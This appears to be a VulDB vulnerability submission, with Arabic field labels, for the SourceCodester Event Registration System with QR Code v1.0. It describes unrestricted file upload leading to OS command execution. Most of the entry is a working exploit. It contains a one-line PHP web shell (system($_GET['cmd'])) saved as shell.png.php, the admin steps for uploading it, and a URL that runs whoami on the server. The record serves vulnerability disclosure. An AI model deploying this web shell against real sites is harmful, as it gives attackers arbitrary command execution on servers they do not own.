| عنوان | OS command injection via File Upload in Event Registration System with QR Code |
|---|
| الوصف | # Exploit Title: Event Registration System with QR Code
# Exploit Author: Krutika Thakur
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/14884/event-registration-system-qr-code-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/14884/event-registration-system-qr-code-php-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
Description:-
A OS command injection via File Upload issue in Event Registration System with QR Code App v.1.0 allows to inject OS command injection which can leads to all internal files in the system
Payload: shell.png.php
<?php echo "Shell";system($_GET['cmd']); ?>
Steps:
1) Login as ADMIN
2) Now go to http://localhost/event/admin/?page=user/list and add user
3) Now fill the details and upload a malicious file.
Payload: shell.png.php
<?php echo "Shell";system($_GET['cmd']); ?>
4) Now save the user
5) Open the image in new tab and in the above url type the below command
http://localhost/event/uploads/1669472280_shell.png.php?cmd=whoami
6) As we can see the OS command injection has been executed |
|---|
| المستخدم | lucifoxer001 (UID 33693) |
|---|
| ارسال | 26/11/2022 03:26 PM (4 سنوات منذ) |
|---|
| الاعتدال | 30/11/2022 11:50 AM (4 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 214590 [SourceCodester Event Registration System 1.0 cmd تجاوز الصلاحيات] |
|---|
| النقاط | 17 |
|---|